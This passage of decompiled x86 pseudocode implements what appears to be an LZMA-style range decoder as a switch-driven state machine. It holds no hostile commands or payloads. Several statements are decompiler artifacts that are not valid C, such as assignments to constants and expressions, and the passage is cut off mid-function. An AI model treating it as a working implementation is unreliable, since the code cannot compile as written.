                        													 *(_t613 - 0x54) = _t606;
                        													goto L133;
                        												}
                        											}
                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                        											__esi =  *(__ebp - 0x60);
                        											__cl = 8;
                        											__cl = 8 -  *(__ebp - 0x3c);
                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                        											__ecx =  *(__ebp - 0x3c);
                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                        											__ecx =  *(__ebp - 4);
                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                        											__eflags =  *(__ebp - 0x38) - 4;
                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        											if( *(__ebp - 0x38) >= 4) {
                        												__eflags =  *(__ebp - 0x38) - 0xa;
                        												if( *(__ebp - 0x38) >= 0xa) {
                        													_t98 = __ebp - 0x38;
                        													 *_t98 =  *(__ebp - 0x38) - 6;
                        													__eflags =  *_t98;
                        												} else {
                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                        												}
                        											} else {
                        												 *(__ebp - 0x38) = 0;
                        											}
                        											__eflags =  *(__ebp - 0x34) - __edx;
                        											if( *(__ebp - 0x34) == __edx) {
                        												__ebx = 0;
                        												__ebx = 1;
                        												goto L61;
                        											} else {
                        												__eax =  *(__ebp - 0x14);
                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        												__eflags = __eax -  *(__ebp - 0x74);
                        												if(__eax >=  *(__ebp - 0x74)) {
                        													__eax = __eax +  *(__ebp - 0x74);
                        													__eflags = __eax;
                        												}
                        												__ecx =  *(__ebp - 8);
                        												__ebx = 0;
                        												__ebx = 1;
                        												__al =  *((intOrPtr*)(__eax + __ecx));
                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                        												goto L41;
                        											}
                        										case 7:
                        											__eflags =  *(__ebp - 0x40) - 1;
                        											if( *(__ebp - 0x40) != 1) {
                        												__eax =  *(__ebp - 0x24);
                        												 *(__ebp - 0x80) = 0x16;
                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        												__eax =  *(__ebp - 0x28);
                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        												__eax =  *(__ebp - 0x2c);
                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        												__eax = 0;
                        												__eflags =  *(__ebp - 0x38) - 7;
                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        												__al = __al & 0x000000fd;
                        												__eax = (__eflags >= 0) - 1 + 0xa;
                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                        												__eax =  *(__ebp - 4);
                        												__eax =  *(__ebp - 4) + 0x664;
                        												__eflags = __eax;
                        												 *(__ebp - 0x58) = __eax;
                        												goto L69;
                        											}
                        											__eax =  *(__ebp - 4);
                        											__ecx =  *(__ebp - 0x38);
                        											 *(__ebp - 0x84) = 8;
                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                        											while(1) {
                        												 *(_t613 - 0x54) = _t606;
                        												goto L133;
                        											}
                        										case 8:
                        											goto L0;
                        										case 9:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												goto L89;
                        											}
                        											__eflags =  *(__ebp - 0x60);
                        											if( *(__ebp - 0x60) == 0) {
                        												goto L171;
                        											}
                        											__eax = 0;
                        											__eflags =  *(__ebp - 0x38) - 7;
                        											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                        											__eflags = _t258;
                        											0 | _t258 = _t258 + _t258 + 9;
                        											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                        											goto L75;
                        										case 0xa:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__eax =  *(__ebp - 4);
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x84) = 0xb;
                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                        												while(1) {
                        													 *(_t613 - 0x54) = _t606;
                        													goto L133;
                        												}
                        											}
                        											__eax =  *(__ebp - 0x28);
                        											goto L88;
                        										case 0xb:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__ecx =  *(__ebp - 0x24);
                        												__eax =  *(__ebp - 0x20);
                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        											} else {
                        												__eax =  *(__ebp - 0x24);
                        											}
                        											__ecx =  *(__ebp - 0x28);
                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        											L88:
                        											__ecx =  *(__ebp - 0x2c);
                        											 *(__ebp - 0x2c) = __eax;
                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        											L89:
                        											__eax =  *(__ebp - 4);
                        											 *(__ebp - 0x80) = 0x15;
                        											__eax =  *(__ebp - 4) + 0xa68;
                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                        											goto L69;
                        										case 0xc:
                        											L99:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0xc;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t334 = __ebp - 0x70;
                        											 *_t334 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t334;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											__eax =  *(__ebp - 0x2c);
                        											goto L101;
                        										case 0xd:
                        											L37:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0xd;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t122 = __ebp - 0x70;
                        											 *_t122 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t122;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											L39:
                        											__eax =  *(__ebp - 0x40);
                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                        												goto L48;
                        											}
                        											__eflags = __ebx - 0x100;
                        											if(__ebx >= 0x100) {
                        												goto L54;
                        											}
                        											L41:
                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                        											__ecx =  *(__ebp - 0x58);
                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                        											 *(__ebp - 0x48) = __eax;
                        											__eax = __eax + 1;
                        											__eax = __eax << 8;
                        											__eax = __eax + __ebx;
                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        											__ax =  *__esi;
                        											 *(__ebp - 0x54) = __esi;
                        											__edx = __ax & 0x0000ffff;
                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                        											__eflags =  *(__ebp - 0xc) - __ecx;
                        											if( *(__ebp - 0xc) >= __ecx) {
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        												__cx = __ax;
                        												 *(__ebp - 0x40) = 1;
                        												__cx = __ax >> 5;
                        												__eflags = __eax;
                        												__ebx = __ebx + __ebx + 1;
                        												 *__esi = __ax;
                        											} else {
                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                        												 *(__ebp - 0x10) = __ecx;
                        												0x800 = 0x800 - __edx;
                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                        												__ebx = __ebx + __ebx;
                        												 *__esi = __cx;
                        											}
                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                        											 *(__ebp - 0x44) = __ebx;
                        											if( *(__ebp - 0x10) >= 0x1000000) {
                        												goto L39;
                        											} else {
                        												goto L37;
                        											}
                        										case 0xe:
                        											L46:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0xe;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t156 = __ebp - 0x70;
                        											 *_t156 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t156;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											while(1) {
                        												L48:
                        												__eflags = __ebx - 0x100;
                        												if(__ebx >= 0x100) {
                        													break;
                        												}
                        												__eax =  *(__ebp - 0x58);
                        												__edx = __ebx + __ebx;
                        												__ecx =  *(__ebp - 0x10);
                        												__esi = __edx + __eax;
                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                        												__ax =  *__esi;
                        												 *(__ebp - 0x54) = __esi;
                        												__edi = __ax & 0x0000ffff;
                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        												__eflags =  *(__ebp - 0xc) - __ecx;
                        												if( *(__ebp - 0xc) >= __ecx) {
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        													__cx = __ax;
                        													_t170 = __edx + 1; // 0x1
                        													__ebx = _t170;
                        													__cx = __ax >> 5;
                        													__eflags = __eax;
                        													 *__esi = __ax;
                        												} else {
                        													 *(__ebp - 0x10) = __ecx;
                        													0x800 = 0x800 - __edi;
                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        													__ebx = __ebx + __ebx;
                        													 *__esi = __cx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													continue;
                        												} else {
                        													goto L46;
                        												}
                        											}
                        											L54:
                        											_t173 = __ebp - 0x34;
                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                        											__eflags =  *_t173;
                        											goto L55;
                        										case 0xf:
                        											L58:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0xf;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t203 = __ebp - 0x70;
                        											 *_t203 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t203;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											L60:
                        											__eflags = __ebx - 0x100;
                        											if(__ebx >= 0x100) {
                        												L55:
                        												__al =  *(__ebp - 0x44);
                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                        												goto L56;
                        											}
                        											L61:
                        											__eax =  *(__ebp - 0x58);
                        											__edx = __ebx + __ebx;
                        											__ecx =  *(__ebp - 0x10);
                        											__esi = __edx + __eax;
                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                        											__ax =  *__esi;
                        											 *(__ebp - 0x54) = __esi;
                        											__edi = __ax & 0x0000ffff;
                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        											__eflags =  *(__ebp - 0xc) - __ecx;
                        											if( *(__ebp - 0xc) >= __ecx) {
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        												__cx = __ax;
                        												_t217 = __edx + 1; // 0x1
                        												__ebx = _t217;
                        												__cx = __ax >> 5;
                        												__eflags = __eax;
                        												 *__esi = __ax;
                        											} else {
                        												 *(__ebp - 0x10) = __ecx;
                        												0x800 = 0x800 - __edi;
                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        												__ebx = __ebx + __ebx;
                        												 *__esi = __cx;
                        											}
                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                        											 *(__ebp - 0x44) = __ebx;
                        											if( *(__ebp - 0x10) >= 0x1000000) {
                        												goto L60;
                        											} else {
                        												goto L58;
                        											}
                        										case 0x10:
                        											L109:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0x10;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t365 = __ebp - 0x70;
                        											 *_t365 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t365;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											goto L111;
                        										case 0x11:
                        											L69:
                        											__esi =  *(__ebp - 0x58);
                        											 *(__ebp - 0x84) = 0x12;
                        											while(1) {
                        												 *(_t613 - 0x54) = _t606;
                        												goto L133;
                        											}
                        										case 0x12:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__eax =  *(__ebp - 0x58);
                        												 *(__ebp - 0x84) = 0x13;
                        												__esi =  *(__ebp - 0x58) + 2;
                        												while(1) {
                        													 *(_t613 - 0x54) = _t606;
                        													goto L133;
                        												}
                        											}
                        											__eax =  *(__ebp - 0x4c);
                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                        											__ecx =  *(__ebp - 0x58);
                        											__eax =  *(__ebp - 0x4c) << 4;
                        											__eflags = __eax;
                        											__eax =  *(__ebp - 0x58) + __eax + 4;
                        											goto L130;
                        										case 0x13:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												_t469 = __ebp - 0x58;
                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                        												__eflags =  *_t469;
                        												 *(__ebp - 0x30) = 0x10;
                        												 *(__ebp - 0x40) = 8;
                        												L144:
                        												 *(__ebp - 0x7c) = 0x14;
                        												goto L145;
                        											}
                        											__eax =  *(__ebp - 0x4c);
                        											__ecx =  *(__ebp - 0x58);
                        											__eax =  *(__ebp - 0x4c) << 4;
                        											 *(__ebp - 0x30) = 8;
                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                        											L130:
                        											 *(__ebp - 0x58) = __eax;
                        											 *(__ebp - 0x40) = 3;
                        											goto L144;
                        										case 0x14:
                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                        											__eax =  *(__ebp - 0x80);
                        											 *(_t613 - 0x88) = _t533;
                        											goto L1;
                        										case 0x15:
                        											__eax = 0;
                        											__eflags =  *(__ebp - 0x38) - 7;
                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        											__al = __al & 0x000000fd;
                        											__eax = (__eflags >= 0) - 1 + 0xb;
                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                        											goto L120;
                        										case 0x16:
                        											__eax =  *(__ebp - 0x30);
                        											__eflags = __eax - 4;
                        											if(__eax >= 4) {
                        												_push(3);
                        												_pop(__eax);
                        											}
                        											__ecx =  *(__ebp - 4);
                        											 *(__ebp - 0x40) = 6;
                        											__eax = __eax << 7;
                        											 *(__ebp - 0x7c) = 0x19;
                        											 *(__ebp - 0x58) = __eax;
                        											goto L145;
                        										case 0x17:
                        											L145:
                        											__eax =  *(__ebp - 0x40);
                        											 *(__ebp - 0x50) = 1;
                        											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                        											goto L149;
                        										case 0x18:
                        											L146:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0x18;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t484 = __ebp - 0x70;
                        											 *_t484 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t484;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											L148:
                        											_t487 = __ebp - 0x48;
                        											 *_t487 =  *(__ebp - 0x48) - 1;
                        											__eflags =  *_t487;
                        											L149:
                        											__eflags =  *(__ebp - 0x48);
                        											if( *(__ebp - 0x48) <= 0) {
                        												__ecx =  *(__ebp - 0x40);
                        												__ebx =  *(__ebp - 0x50);
                        												0 = 1;
                        												__eax = 1 << __cl;
                        												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                        												__eax =  *(__ebp - 0x7c);
                        												 *(__ebp - 0x44) = __ebx;
                        												while(1) {
                        													 *(_t613 - 0x88) = _t533;
                        													goto L1;
                        												}
                        											}
                        											__eax =  *(__ebp - 0x50);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        											__eax =  *(__ebp - 0x58);
                        											__esi = __edx + __eax;
                        											 *(__ebp - 0x54) = __esi;
                        											__ax =  *__esi;
                        											__edi = __ax & 0x0000ffff;
                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        											__eflags =  *(__ebp - 0xc) - __ecx;
                        											if( *(__ebp - 0xc) >= __ecx) {
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        												__cx = __ax;
                        												__cx = __ax >> 5;
                        												__eax = __eax - __ecx;
                        												__edx = __edx + 1;
                        												__eflags = __edx;
                        												 *__esi = __ax;
                        												 *(__ebp - 0x50) = __edx;
                        											} else {
                        												 *(__ebp - 0x10) = __ecx;
                        												0x800 = 0x800 - __edi;
                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        												 *__esi = __cx;
                        											}
                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                        											if( *(__ebp - 0x10) >= 0x1000000) {
                        												goto L148;
                        											} else {
                        												goto L146;
                        											}
                        										case 0x19:
                        											__eflags = __ebx - 4;
                        											if(__ebx < 4) {
                        												 *(__ebp - 0x2c) = __ebx;
                        												L119:
                        												_t393 = __ebp - 0x2c;
                        												 *_t393 =  *(__ebp - 0x2c) + 1;
                        												__eflags =  *_t393;
                        												L120:
                        												__eax =  *(__ebp - 0x2c);
                        												__eflags = __eax;
                        												if(__eax == 0) {
                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                        													goto L170;
                        												}
                        												__eflags = __eax -  *(__ebp - 0x60);
                        												if(__eax >  *(__ebp - 0x60)) {
                        													goto L171;
                        												}
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                        												__eax =  *(__ebp - 0x30);
                        												_t400 = __ebp - 0x60;
                        												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                        												__eflags =  *_t400;
                        												goto L123;
                        											}
                        											__ecx = __ebx;
                        											__eax = __ebx;
                        											__ecx = __ebx >> 1;
                        											__eax = __ebx & 0x00000001;
                        											__ecx = (__ebx >> 1) - 1;
                        											__al = __al | 0x00000002;
                        											__eax = (__ebx & 0x00000001) << __cl;
                        											__eflags = __ebx - 0xe;
                        											 *(__ebp - 0x2c) = __eax;
                        											if(__ebx >= 0xe) {
                        												__ebx = 0;
                        												 *(__ebp - 0x48) = __ecx;
                        												L102:
                        												__eflags =  *(__ebp - 0x48);
                        												if( *(__ebp - 0x48) <= 0) {
                        													__eax = __eax + __ebx;
                        													 *(__ebp - 0x40) = 4;
                        													 *(__ebp - 0x2c) = __eax;
                        													__eax =  *(__ebp - 4);
                        													__eax =  *(__ebp - 4) + 0x644;
                        													__eflags = __eax;
                        													L108:
                        													__ebx = 0;
                        													 *(__ebp - 0x58) = __eax;
                        													 *(__ebp - 0x50) = 1;
                        													 *(__ebp - 0x44) = 0;
                        													 *(__ebp - 0x48) = 0;
                        													L112:
                        													__eax =  *(__ebp - 0x40);
                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                        														_t391 = __ebp - 0x2c;
                        														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                        														__eflags =  *_t391;
                        														goto L119;
                        													}
                        													__eax =  *(__ebp - 0x50);
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        													__eax =  *(__ebp - 0x58);
                        													__esi = __edi + __eax;
                        													 *(__ebp - 0x54) = __esi;
                        													__ax =  *__esi;
                        													__ecx = __ax & 0x0000ffff;
                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                        													__eflags =  *(__ebp - 0xc) - __edx;
                        													if( *(__ebp - 0xc) >= __edx) {
                        														__ecx = 0;
                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                        														__ecx = 1;
                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                        														__ebx = 1;
                        														__ecx =  *(__ebp - 0x48);
                        														__ebx = 1 << __cl;
                        														__ecx = 1 << __cl;
                        														__ebx =  *(__ebp - 0x44);
                        														__ebx =  *(__ebp - 0x44) | __ecx;
                        														__cx = __ax;
                        														__cx = __ax >> 5;
                        														__eax = __eax - __ecx;
                        														__edi = __edi + 1;
                        														__eflags = __edi;
                        														 *(__ebp - 0x44) = __ebx;
                        														 *__esi = __ax;
                        														 *(__ebp - 0x50) = __edi;
                        													} else {
                        														 *(__ebp - 0x10) = __edx;
                        														0x800 = 0x800 - __ecx;
                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        														 *__esi = __dx;
                        													}
                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                        													if( *(__ebp - 0x10) >= 0x1000000) {
                        														L111:
                        														_t368 = __ebp - 0x48;
                        														 *_t368 =  *(__ebp - 0x48) + 1;
                        														__eflags =  *_t368;
                        														goto L112;
                        													} else {
                        														goto L109;
                        													}
                        												}
                        												__ecx =  *(__ebp - 0xc);
                        												__ebx = __ebx + __ebx;
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                        													__ecx =  *(__ebp - 0x10);
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        													__ebx = __ebx | 0x00000001;
                        													__eflags = __ebx;
                        													 *(__ebp - 0x44) = __ebx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													L101:
                        													_t338 = __ebp - 0x48;
                        													 *_t338 =  *(__ebp - 0x48) - 1;
                        													__eflags =  *_t338;
                        													goto L102;
                        												} else {
                        													goto L99;
                        												}
                        											}
                        											__edx =  *(__ebp - 4);
                        											__eax = __eax - __ebx;
                        											 *(__ebp - 0x40) = __ecx;
                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                        											goto L108;
                        										case 0x1a:
                        											L56:
                        											__eflags =  *(__ebp - 0x64);
                        											if( *(__ebp - 0x64) == 0) {
                        												 *(__ebp - 0x88) = 0x1a;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x68);
                        											__al =  *(__ebp - 0x5c);
                        											__edx =  *(__ebp - 8);
                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        											 *( *(__ebp - 0x68)) = __al;
                        											__ecx =  *(__ebp - 0x14);
                        											 *(__ecx +  *(__ebp - 8)) = __al;
                        											__eax = __ecx + 1;
                        											__edx = 0;
                        											_t192 = __eax %  *(__ebp - 0x74);
                        											__eax = __eax /  *(__ebp - 0x74);
                        											__edx = _t192;
                        											goto L79;
                        										case 0x1b:
                        											L75:
                        											__eflags =  *(__ebp - 0x64);
                        											if( *(__ebp - 0x64) == 0) {
                        												 *(__ebp - 0x88) = 0x1b;
                        												goto L170;
                        											}
                        											__eax =  *(__ebp - 0x14);
                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        											__eflags = __eax -  *(__ebp - 0x74);
                        											if(__eax >=  *(__ebp - 0x74)) {
                        												__eax = __eax +  *(__ebp - 0x74);
                        												__eflags = __eax;
                        											}
                        											__edx =  *(__ebp - 8);
                        											__cl =  *(__eax + __edx);
                        											__eax =  *(__ebp - 0x14);
                        											 *(__ebp - 0x5c) = __cl;
                        											 *(__eax + __edx) = __cl;
                        											__eax = __eax + 1;
                        											__edx = 0;
                        											_t274 = __eax %  *(__ebp - 0x74);
                        											__eax = __eax /  *(__ebp - 0x74);
                        											__edx = _t274;
                        											__eax =  *(__ebp - 0x68);
                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        											_t283 = __ebp - 0x64;
                        											 *_t283 =  *(__ebp - 0x64) - 1;
                        											__eflags =  *_t283;
                        											 *( *(__ebp - 0x68)) = __cl;
                        											L79:
                        											 *(__ebp - 0x14) = __edx;
                        											goto L80;
                        										case 0x1c:
                        											while(1) {
                        												L123:
                        												__eflags =  *(__ebp - 0x64);
                        												if( *(__ebp - 0x64) == 0) {
                        													break;
                        												}
                        												__eax =  *(__ebp - 0x14);
                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        												__eflags = __eax -  *(__ebp - 0x74);
                        												if(__eax >=  *(__ebp - 0x74)) {
                        													__eax = __eax +  *(__ebp - 0x74);
                        													__eflags = __eax;
                        												}
                        												__edx =  *(__ebp - 8);
                        												__cl =  *(__eax + __edx);
                        												__eax =  *(__ebp - 0x14);
                        												 *(__ebp - 0x5c) = __cl;
                        												 *(__eax + __edx) = __cl;
                        												__eax = __eax + 1;
